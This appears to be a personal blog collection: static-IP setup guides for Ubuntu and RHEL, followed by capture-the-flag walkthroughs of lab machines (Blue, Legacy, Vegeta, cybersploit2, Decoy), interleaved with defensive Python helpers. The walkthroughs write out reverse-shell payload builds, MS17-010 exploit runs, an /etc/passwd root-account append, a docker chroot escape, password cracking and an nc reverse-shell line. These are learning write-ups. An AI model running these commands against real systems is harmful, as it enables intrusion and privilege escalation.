Author: Samdup

  • How to set up a static IP address on Ubuntu Server 20.04

    Task: 
    DNS: 192.168.56.1
    Gateway: 192.168.56.1
    Netmask: 255.255.255.0
    IPv4: 192.168.56.12 

    sudo vim /etc/netplan/00-installer-config.yaml

    # This is the network config written by 'Samdup'
    network:
      version: 2
      renderer: networkd
      ethernets:
        enp0s3:
          dhcp4: true
        enp0s8:
          dhcp4: no
          dhcp6: no
          addresses: [192.168.56.12/24]
          gateway4: 192.168.56.1
          nameservers:
            addresses: [8.8.8.8, 8.8.4.4]

    sudo netplan apply 
  • How to set up a static IP address on RHEL 8 or CentOS

    Although there are many benefits to assigning a static IP address to a machine, for me it mainly helps me stay organized and monitor my machines more conveniently. Besides, it has become a habit that whenever I have to access machines in VMware or VirtualBox, I SSH to them from my host machine. So, in this article I will share how to set a static IP address on your machine without using any graphical tools (because 99.9% of the servers I have worked on have no GUI; moreover, I enjoy the power the command line offers).

    Task:

    Assign a static IP address using the following information (you can alter it based on your Host-only Network IP address):
    IP address: 192.168.56.11
    Default Gateway: 192.168.56.1
    DNS: 192.168.56.1
    Netmask: 255.255.255.0

    I ran ifconfig on my machine. You can clearly see that I have two network interface (ifname) slots, and one of them (ens192) is empty.

    Command:

    First, let’s run

    nmcli c s

    nmcli is the network management tool (the package) we are going to use (nmtui is a great option too, but it may not be available on every server)

    c is the shorthand of connection

    s is to show

    To know the interface name and other details…

    Yes, the above command confirmed what we had inferred from the ifconfig result.

    Here we go

    nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses 192.168.56.11/24 ipv4.dns 192.168.56.1 ipv4.method manual

    Narration:

    Although you can find out what each flag does by simply running man nmcli, let me give a short explanation, mainly to get a grasp of the concept for myself.

    We are adding (add) a new connection named (con-name) lab on the network interface (ifname) ens192, which connects automatically (autoconnect yes) with IP address 192.168.56.11/24 (netmask 255.255.255.0), using the nmcli tool.

    Method manual means it is a static IP assignment. Until we explicitly change the IP address, it stays as it is, unlike what we experience with our home devices (which use DHCP).

    nmcli connection up lab

    It appears that the new connection is ready even without running the above command; however, I like to run it anyway (because I am afraid that may not be the case in an exam environment or on a real server that you have to manage).

    To verify the result…

    ifconfig

    We got the IP address and Netmask correct.

    cat /etc/resolv.conf

    We got DNS correct

    However, we did not get the Gateway configured.

    route -n

    It is indeed a blessing in disguise, because we got the opportunity to learn how to edit the value in case we need to in the future. I know the command has something to do with edit, so let me quickly run man nmcli.

    The screenshot above is nothing but the output of the man command.

    Method 1

    nmcli connection edit lab

    It drops you into an interactive editor. In it, set the option:

    set ipv4.gateway 192.168.56.1

    then run save to write the connection and quit to exit.

    Method 2  (Referred from this site)

    I really like this command more. It’s simple and gets the job done.

    nmcli connection modify lab ipv4.gateway 192.168.56.1

    To verify:

    route -n

    Combined output result is in the screenshot

    Finally, we reboot the machine and check whether everything still works.

    Yes, everything works perfectly, and just to reassure you about the Gateway, I have enclosed the result here.

    route -n
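    Both posts above amount to the same plan (address, netmask, gateway, DNS) expressed two ways. The Python below is an added example, not code from either post: it checks such a plan for the slips that appear above (a mask typed with colons, a gateway missing from the nmcli line, a gateway outside the subnet) and renders it as both the netplan YAML and the nmcli command; the function names are mine, the addresses and interface names are the posts'.

```python
"""Check a static IPv4 plan and render it for netplan and for nmcli.

Added example, not code from the original posts. The addresses are the ones
the two posts above use; function names are my own, the interface names
(enp0s8 for netplan, ens192/lab for nmcli) are taken from the posts.
"""
import ipaddress


def netmask_to_prefix(netmask: str) -> int:
    """255.255.255.0 -> 24. Raises ValueError for junk such as 255:255:255:0."""
    return ipaddress.IPv4Network(f"0.0.0.0/{netmask}").prefixlen


def check_plan(ip: str, netmask: str, gateway: str, dns: str) -> list:
    """Return a list of problems; an empty list means the plan is consistent."""
    try:
        prefix = netmask_to_prefix(netmask)
    except ValueError:
        # The RHEL post's task list wrote the mask as 255:255:255:0; catch that
        # before it reaches a config file.
        return [f"netmask {netmask!r} is not a dotted-quad mask"]
    try:
        iface = ipaddress.IPv4Interface(f"{ip}/{prefix}")
        gw = ipaddress.IPv4Address(gateway)
        ipaddress.IPv4Address(dns)
    except ValueError as exc:
        return [f"bad address: {exc}"]
    net = iface.network
    problems = []
    if gw not in net:
        problems.append(f"gateway {gateway} is outside {net}; the default route would fail")
    if iface.ip in (net.network_address, net.broadcast_address):
        problems.append(f"{ip} is the network or broadcast address of {net}")
    if iface.ip == gw:
        problems.append(f"host address {ip} collides with the gateway")
    return problems


def render_netplan(ifname: str, ip: str, netmask: str, gateway: str, dns: list) -> str:
    """Netplan YAML, with the nesting the Ubuntu post's pasted file had lost."""
    prefix = netmask_to_prefix(netmask)
    return "\n".join([
        "network:",
        "  version: 2",
        "  renderer: networkd",
        "  ethernets:",
        f"    {ifname}:",
        "      dhcp4: no",
        f"      addresses: [{ip}/{prefix}]",
        f"      gateway4: {gateway}",
        "      nameservers:",
        f"        addresses: [{', '.join(dns)}]",
    ]) + "\n"


def render_nmcli(con_name: str, ifname: str, ip: str, netmask: str,
                 gateway: str, dns: list) -> str:
    """The `nmcli connection add` line with ipv4.gateway included up front
    (the RHEL post left it out and had to add it later with `connection modify`)."""
    prefix = netmask_to_prefix(netmask)
    return (f"nmcli connection add con-name {con_name} ifname {ifname} type ethernet "
            f"autoconnect yes ipv4.method manual ipv4.addresses {ip}/{prefix} "
            f"ipv4.gateway {gateway} ipv4.dns {','.join(dns)}")


if __name__ == "__main__":
    plan = {"ip": "192.168.56.11", "netmask": "255.255.255.0",
            "gateway": "192.168.56.1", "dns": "192.168.56.1"}
    for problem in check_plan(**plan):
        print("PROBLEM:", problem)
    print(render_netplan("enp0s8", plan["ip"], plan["netmask"], plan["gateway"], [plan["dns"]]))
    print(render_nmcli("lab", "ens192", plan["ip"], plan["netmask"], plan["gateway"], [plan["dns"]]))
```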

     

  • Taking down Blue (a Windows machine) without using Metasploit

    Today I am going to take down a machine called ‘Blue’. It’s a Windows 7 based machine. I didn’t expect that I could pwn the machine quite so easily… Anyway, here is my walkthrough. By the way, this is not necessarily the only way to compromise the machine. Ok, enough said, let’s do some work…

    nmap -sC -sV 10.10.10.40 -oN nmap1.log
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    49152/tcp open msrpc Microsoft Windows RPC
    49153/tcp open msrpc Microsoft Windows RPC
    49154/tcp open msrpc Microsoft Windows RPC
    49155/tcp open msrpc Microsoft Windows RPC
    49156/tcp open msrpc Microsoft Windows RPC
    49157/tcp open msrpc Microsoft Windows RPC
    Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    nmap --script "smb-vuln*" -oN smb-vuln.log 10.10.10.40
    Nmap scan report for 10.10.10.40
    Host is up (0.43s latency).
    Not shown: 991 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    49152/tcp open unknown
    49153/tcp open unknown
    49154/tcp open unknown
    49155/tcp open unknown
    49156/tcp open unknown
    49157/tcp open unknown

    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
    | smb-vuln-ms17-010:
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |       servers (ms17-010).

    After googling, I found that this repository has everything you need for MS17-010 (aka EternalBlue):

    git clone https://github.com/helviojunior/MS17-010.git

    cd MS17-010

    We need to build a simple payload (one that creates a reverse connection from the Windows 7 machine back to our Kali Linux machine). Remember, we are never going to depend on the Meterpreter shell, which is not allowed in the exam; in lieu of it, I am going to use the shell_reverse_tcp payload.

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1337 -f exe > blue.exe

    I don’t think you need me to explain what those options do, because I did that in my previous post. It is here.

    Although the MS17-010 repository contains the exploit, I didn’t use it; instead I manually searched for an exploit on exploit-db.

    searchsploit MS17-010

    cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

    Then we need to modify the exploit code. (I have highlighted the line where it needs modification.)

    You need to fill in the guest username (you can see it either from the nmap result, or the following command can help you confirm there is a guest user). By the way, there are two ways to fill in the guest user: the conventional way is to put the username as guest; the other is simply to put // (yes, two forward slashes between the quotes).

    Once the modification is done, follow these steps.

    I usually split the terminal using tmux; in one shell you wait for the reverse connection from the Windows machine (on the LPORT given to msfvenom above).

    nc -lvp 1337

    And on another shell

    python 42315.py 10.10.10.40

    Once you are successful, you will get the system32 prompt like in the screenshot below.

    User flag (remember, type in the Windows command prompt is the same as cat in Linux – I know this claim is a stretch, but let us go with it for the time being)

    Finally the root flag…

  • Taking down Legacy (a Windows machine) without using Metasploit

    Hello guys,
    Today I am going to take down one simple box from Hack The Box. Recently I purchased VIP lab access. By the way, the machine is called Legacy and it’s a Windows machine.

    This is my first write-up of machines from that lab.

    Since we already have the machine IP address (it’s shown in the web portal), let’s check what ports are open and what services are running..

    Overview:
    
    Machine IP: 10.10.10.4
    Kali Linux : 10.10.14.10
    
    Target:
    1. To get the user flag
    2. To get the root flag

    Information Gathering Phase:

    nmap -sC -sV 10.10.10.4 -Pn
    Nmap scan report for 10.10.10.4
    PORT STATE SERVICE VERSION
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    445/tcp open microsoft-ds Windows XP microsoft-ds
    Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
    

    From the above result, we can conclude that the target machine is running Windows XP and has ports 139 and 445 open. Besides, it is running a Samba (SMB) server.

    If you want to know more, you can also run the above command with the -v option. (However, the attached screenshot shows the result of the command without -v.)

    nmap -sC -sV -v -p139,445 10.10.10.4 -oN nmap.log -Pn

    Based on the above result, we are certain that this Samba version is vulnerable. However, the following NSE script (nmap script) can give us better vulnerability details, and it will also recommend related exploits if it has any.

    nmap --script "smb-vuln*" -oN nmap_smb_vul.log -Pn 10.10.10.4
    PORT STATE SERVICE
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    Host script results:
    | smb-vuln-ms08-067:
    | VULNERABLE:
    | Microsoft Windows system vulnerable to remote code execution (MS08-067)
    | State: VULNERABLE
    | IDs: CVE:CVE-2008-4250
    | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
    | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
    | code via a crafted RPC request that triggers the overflow during path canonicalization.
    |
    | Disclosure date: 2008-10-23
    | References:
    | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
    |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
    | smb-vuln-ms17-010:
    | VULNERABLE:
    | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    | State: VULNERABLE
    | IDs: CVE:CVE-2017-0143
    | Risk factor: HIGH
    | A critical remote code execution vulnerability exists in Microsoft SMBv1
    | servers (ms17-010).
    |
    | Disclosure date: 2017-03-14
    | References:
    | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

    You can clearly see that it has suggested two exploits; however, since the first one is having some issue (which I colored red), I am going to use the second. (Note: this is not an absolute approach, because sometimes a minor change in the exploit might make it work, so try to fix the issues of the first exploit if time permits.)

    Although I found many exploits for MS17-010, I am going to do it without Metasploit (which is a powerful automation framework). So let’s do some shopping online.

    We are going to clone a GitHub repository… (There are many GitHub accounts hosting exploit code for MS17-010, but we need one with a “send script” (send_and_execute.py) to send our executable from the host machine (Kali Linux) to the remote machine (the Windows machine). Since many repositories don’t have send_and_execute.py, I am emphasizing it. If you read further you will see why it matters.)

    git clone https://github.com/helviojunior/MS17-010

    cd MS17-010

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

    I was a little skeptical about using msfvenom at the beginning, as in the OSCP exam we are allowed to use Metasploit only twice (and my plan is not to use it at all). Nevertheless, after reading a couple of blogs by senior OSCP holders, I understood that we can use msfvenom, though they discouraged using Meterpreter.

    -p payload
    LHOST local host (the address the shell connects back to)
    LPORT local port

    I might need to explain a little regarding EXITFUNC=thread:
    - The EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete.
    - The thread method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread, and exiting this thread leaves a working application/system (clean exit).
    - To know more, kindly visit this link.

    -f output format
    -a architecture
    -o output file and path

    If you have observed carefully, you might have noticed that our executable ms17-010.exe (which uses the payload windows/shell_reverse_tcp) will give us a reverse connection to our Kali Linux machine (the local host) on LPORT 1234.

    Therefore, I will wait for a reverse connection on my LHOST at LPORT 1234.

    nc -lvp 1234

    And in another terminal (remember to cd into the MS17-010 folder if you are opening a fresh terminal), run the following command. (By the way, I highly recommend tmux to split the terminal and boost your productivity.)

    python send_and_execute.py 10.10.10.4 ms17-010.exe

    Yes, if you are successful, the terminal that was listening on port 1234 gets the reverse connection and you will see something like the following screenshot. (Focus on the highlighted area.)

    I will not bore you with my English (Tibetish lol), so I have attached the remaining steps as screenshots.

    That’s all guys … See you in the next post 🙂
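    Both Windows write-ups turn on the same `smb-vuln*` host-script output, and a defender scanning their own estate reads it the same way. The following Python parser is an added example (not from the original posts): it converts that block into per-check verdicts so hosts still exposed to MS08-067 or MS17-010 (patch them, or disable SMBv1) can be listed, and it keeps checks that errored out apart from checks that came back clean. SAMPLE is a trimmed, constructed copy of the Legacy output above; the function names are mine.

```python
"""Parse `nmap --script "smb-vuln*"` host-script output into per-check verdicts.

Added example, not code from the original posts. SAMPLE is a constructed,
trimmed copy of the Legacy scan output above; the function names are my own.
"""
import re

SAMPLE = """\
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

SCRIPT_RE = re.compile(r"^(smb-vuln-[\w-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_smb_vuln(text: str) -> dict:
    """Map each smb-vuln-* script to {'state', 'cves', 'risk', 'note'}.

    nmap prints three shapes: a one-line verdict (`|_...: false`), a one-line
    failure (`ERROR: ...`, or an NT_STATUS code as in the Blue scan), and a
    multi-line block whose `State:` / `IDs:` sub-lines carry the verdict.
    """
    results, current = {}, None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue  # port table, "Host script results:", blank lines
        line = raw.lstrip("|_ ").strip()
        m = SCRIPT_RE.match(line)
        if m:
            name, rest = m.groups()
            current = results.setdefault(
                name, {"state": "unknown", "cves": set(), "risk": None, "note": ""})
            if rest.lower() == "false":
                current["state"] = "not vulnerable"
            elif rest.lower() == "true":
                current["state"] = "vulnerable"
            elif rest:  # the check could not complete; keep nmap's reason
                current["state"], current["note"] = "error", rest
            continue
        if current is None:
            continue
        if line.startswith("State:"):
            current["state"] = line.split(":", 1)[1].strip().lower()
        elif line.startswith("IDs:"):
            current["cves"].update(CVE_RE.findall(line))
        elif line.startswith("Risk factor:"):
            current["risk"] = line.split(":", 1)[1].strip()
    return results


def vulnerable_checks(results: dict) -> list:
    """Checks reported VULNERABLE or LIKELY VULNERABLE: these hosts need patching."""
    return sorted(n for n, r in results.items()
                  if r["state"].endswith("vulnerable") and not r["state"].startswith("not"))


def errored_checks(results: dict) -> list:
    """Checks that did not complete: a coverage gap, not a clean bill of health."""
    return sorted(n for n, r in results.items() if r["state"] == "error")


if __name__ == "__main__":
    verdicts = parse_smb_vuln(SAMPLE)
    for n in vulnerable_checks(verdicts):
        print(f"PATCH: {n} {sorted(verdicts[n]['cves'])} risk={verdicts[n]['risk']}")
    for n in errored_checks(verdicts):
        print(f"RERUN: {n} ({verdicts[n]['note']})")
```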

  • My approach to the Vegeta machine

    Overview:

    Target Machine IP Address: 192.168.56.46  
    My Machine IP Address: 192.168.56.20

    Mission:

    Boot to Root

    THIS IS A MACHINE FOR COMPLETE BEGINNER , GET THE FLAG AND SHARE IN THE TELEGRAM GROUP (GROUP LINK WILL BE IN FLAG.TXT)
    
    DHCP : ENABLED
    IP : AUTO ASSIGN

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- 192.168.56.46 -oN nmap.log

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    80/tcp open http Apache httpd 2.4.38 ((Debian))

    I checked the source code and ran exiftool on the image but didn’t get a good result, so I will not write up those processes here (afraid they may bog you down with rabbit holes). However, something interesting is showing in robots.txt.

    Note: Don’t just stop there; I missed it once. Look at the line numbers; something must be at the bottom.


    Yes, this is base64. We need to decode it.

    If you wonder why I decoded twice, try it with a single decode. The output of the first base64 decode is another base64 string, so I decoded it twice.

    The decoded file is actually a PNG image; do you see PNG at the top of the screenshot?

    I have redirected the output and named the file decoded.png

    It is a QR code. Now I need to do a little shopping: find an online tool that could read the code and spit out the message, if it has any… By the way, I tried my mobile QR reader and already got the message; however, let’s do it the usual way…

    I am going to use this tool to decode the message: https://zxing.org/w/decode.jspx

    Password: topshellv

    I also scanned with Nikto and Gobuster; both gave me some information, but so far it appears to be another rabbit hole 🙂

    As you can see, that directory redirects somewhere (not known yet; I am planning to run Burp Suite to look into it).

    In the Nikto result there is a link that intrigued me; I am not sure whether it is again a rabbit hole, but let’s keep it in our notes.

    I must confess that I was not able to get anything of use, so I had to peek at other people’s write-ups. The author of that write-up used a custom wordlist which is not in the set of directory wordlists we normally use. Therefore, I think we really need to keep in mind that if a scanner finds nothing, that doesn’t mean nothing is there.

    Actually, I could add the word bulma to the dictionary and act as if I found the directory using the scanner, but I don’t think that is the way.

    Anyway, let’s proceed with the directory http://192.168.56.46/bulma/

    I am impressed with this audio file because it contains Morse code. (I don’t know how to read Morse code manually; however, we can find a tool for that.)

    Tool to decode the Morse audio file: Click Here.

    We got username: trunks 
    password: u$3r

    If you run this command, you will get to know which (system) directories you can write to (or modify).

    find / -writable -type d 2>/dev/null

    There were so many entries that I could edit. I did a quick skim. However, the last one attracted me the most.

    /etc/passwd

    Let’s modify this file using the findings…

    echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
    (which means we added a user named Tom whose password is Password@973)

    su Tom
    cat root.txt
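    From the defender's side, the append above leaves two fingerprints in /etc/passwd: a second uid-0 account, and a password hash sitting in passwd rather than shadow; and it only works because the file was writable. The Python below is an added example (not from the original post) that audits passwd lines for exactly those signs and checks the file's mode; PASSWD_SAMPLE is constructed and the function names are mine.

```python
"""Audit /etc/passwd for the root-equivalent account the post above appends.

Added example, not from the original post. PASSWD_SAMPLE is constructed
(a few normal entries plus the exact line the write-up adds); function
names are my own.
"""
import os
import stat

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
trunks:x:1000:1000:trunks,,,:/home/trunks:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""

# Password-field values that mean "hash is in /etc/shadow" or "login disabled".
SHADOWED = {"x", "*", "!", "!!", ""}


def audit_passwd(text: str) -> list:
    """Return (line_no, finding, account) tuples for suspicious passwd entries."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, "malformed entry (expected 7 fields)", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            # A second uid-0 user is root in all but name (`su Tom` in the post).
            findings.append((line_no, "extra uid-0 (root-equivalent) account", name))
        if pw not in SHADOWED:
            # A hash in world-readable passwd is crackable offline and is the
            # tell-tale of an `echo ... >> /etc/passwd` style backdoor.
            findings.append((line_no, "password hash stored in passwd instead of shadow", name))
    return findings


def mode_writable_by_others(mode: int) -> bool:
    """True if the group or world write bit is set in an st_mode value."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def writable_by_others(path: str) -> bool:
    """The precondition for the append in the post; /etc/passwd should be 0644."""
    return mode_writable_by_others(os.stat(path).st_mode)


if __name__ == "__main__":
    for line_no, finding, account in audit_passwd(PASSWD_SAMPLE):
        print(f"line {line_no}: {finding}: {account}")
    if os.path.exists("/etc/passwd"):
        print("/etc/passwd writable by group/others:", writable_by_others("/etc/passwd"))
```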

    That’s it, guys… if you don’t like enumerating manually, you can use linpeas.sh to enumerate the box for you…

    Additional Note:

    I uploaded linpeas.sh to the target machine from my Kali machine using SimpleHTTPServer (by the way, to save some time, I aliased the command as up).

  • Fix for Error “Before you can run vmware several modules must be compiled”

    git clone https://github.com/mkubecek/vmware-host-modules
    cd vmware-host-modules
    git checkout workstation-15.5.6
    sudo make ; sudo make install

  • Rooting the cybersploit 2 machine?

    Overview:

    Target Machine IP Address: 192.168.56.41
    My Machine IP Address: 192.168.56.20

    Mission:

    Boot to Root

    Your target is gain the Root access
    
    There is no any flag in this VMs
    
    Share root access with me twitter@cybersploit1
    
    This works better with VirtualBox rather than VMware

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- 192.168.56.41 -oN nmap.log

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
    80/tcp open http Apache httpd 2.4.37 ((centos))

    Let’s browse 192.168.56.41

    Some strings are encrypted. Let’s check out the source code (Ctrl+U shortcut).

    Yes, this is a ROT47-encoded message. I thought about writing a script for this, but let’s not waste time; better to google an online tool for the task. I used this one.

    username: D92:=6?5C2 -> shailendra
    password: 4J36CDA=@:E-> cybersploit1
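    The script the author skipped is short enough to include; this Python ROT47 decoder is an added example, not from the original post. `rot_ascii` generalises it to any shift over the 94 printable ASCII characters (ROT47 is the shift that is its own inverse); the two encoded strings are the ones quoted above.

```python
"""ROT47 decoder for the strings found in the cybersploit2 page source.

Added example, not from the original post (the author used an online tool).
rot_ascii generalises ROT47 to any shift over the 94 printable ASCII
characters (0x21..0x7E), which is how ROT47 relates to ROT13.
"""


def rot_ascii(text: str, shift: int) -> str:
    """Rotate printable ASCII (! through ~) by `shift`; other characters pass through."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + shift) % 94))
        else:
            out.append(ch)  # spaces, newlines, non-ASCII are left alone
    return "".join(out)


def rot47(text: str) -> str:
    """ROT47 is its own inverse: 47 + 47 = 94, one full turn of the alphabet."""
    return rot_ascii(text, 47)


# Constructed copy of the two encoded values quoted in the write-up.
ENCODED = {"username": "D92:=6?5C2", "password": "4J36CDA=@:E"}

if __name__ == "__main__":
    for label, value in ENCODED.items():
        print(f"{label}: {value} -> {rot47(value)}")
```

The password string as quoted decodes to `cybersploit`; the trailing `1` reported above is not part of the quoted encoded value.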

    Since the target machine is running SSH service, let’s try that.

    ssh shailendra@192.168.56.41

    ls -lah

    We got a hint.txt

    The system is running docker.

    Always remember, this will be our black book of magic: gtfobins.github.io/

    docker run -v /:/mnt --rm -it alpine chroot /mnt sh 

    However, to run this command you need internet access (at least in my case); otherwise you may not be able to pull alpine:latest.

    Finally, cybersploit2 is pwned!!

  • Shelling Decoy

    Overview:

    Target Machine IP Address: 192.168.56.42
    My Machine IP Address: 192.168.56.20

    Mission:

    THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FLAGS AVAILABLE IN THIS VM.
    
    FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

    Download:

    You can download the machine from here.

    ************************************

    Information Gathering & Scanning Process:

    sudo arp-scan --interface=eth0 192.168.56.1/24

    nmap -sC -sV -p- 192.168.56.42 -oN nmap.log

    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    
    80/tcp open http Apache httpd 2.4.38
    | http-ls: Volume /
    | SIZE TIME FILENAME
    | 3.0K 2020-07-07 16:36 save.zip

    The zip file requires a password. I was not able to find anything that could be leveraged as the password, so let’s brute force it with fcrackzip using rockyou.txt.

    fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip

    password: manuel

    We were able to get some juicy information, and I am not going to go through each file here; however, I am sure you know that the shadow file holds the hashed passwords of the users. I think this may be enough.

    We need to crack the hash, so let’s use john for the task: take the necessary hashes and put them in one file.

    username: 296640a3b825115a47b68fc44501c828

    echo '$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.' > ../hash.txt

    ssh 296640a3b825115a47b68fc44501c828@192.168.56.42

    password: server

    We need to bypass the rbash restriction. I have never done it before; however, I have seen it in blogs and YouTube videos by IppSec.

    If you want to know more about rbash bypass, you can read it here: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

    From that PDF resource, I tried all the commands and they didn’t work. However, when I tried the following from the Advanced Techniques part, it no longer gives me

    ssh 296640a3b825115a47b68fc44501c828@192.168.56.42 -t "bash --noprofile"

    Now we can see that it no longer shows us the rbash restriction but rather command not found, which means the binary or command path needs to be fixed here.

    What I did was echo the PATH on my Kali machine, copy it and set it on the target machine. Perhaps you will understand it better from this screenshot.

    PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/go/bin/:/root/go-workspace/bin

    Ok, let’s download pspy on the Kali machine and then transfer it to our target machine. I use SimpleHTTPServer for this; of course, you can use your own method 🙂

    Let’s do a searchsploit chkrootkit, or search chkrootkit on Google (it will show exploit-db, which is the web front-end of searchsploit).

    When we read the exploit’s steps (how to configure and how to use it), it tells us this..

    The steps are quite self-explanatory; what I did here is check the location of the nc program on the target box and then have it run /bin/sh on port 1234, giving a reverse connection to IP address 192.168.56.33 (my Kali machine). Of course, as per the instructions we need to give execute permission to our executable file.

    Note: I checked the cron entries and was not able to find anything relevant, neither that update (which we created) is being run nor anything chkrootkit related. Interestingly, when I checked the processes with pspy64, /tmp/update was running periodically. Therefore, we can leverage that for our purpose. By the way, this might be because running the program honeypot.decoy triggers chkrootkit.

    Exploit 1:

    #!/bin/bash
    echo 'root:tcert.net' | sudo chpasswd

    save it as update (by the way, you have to use the nano editor this time because, if I am not wrong, vi is not available)

    chmod +s update  (I sipped tea and looked around) and then

    su - root

    password: tcert.net

    Exploit 2:  (It didn’t work for me. I need to dig a little deeper)

    echo "/usr/bin/nc -e /bin/sh 192.168.56.33:1234" > update
    chmod +x update

    That’s all guys 🙂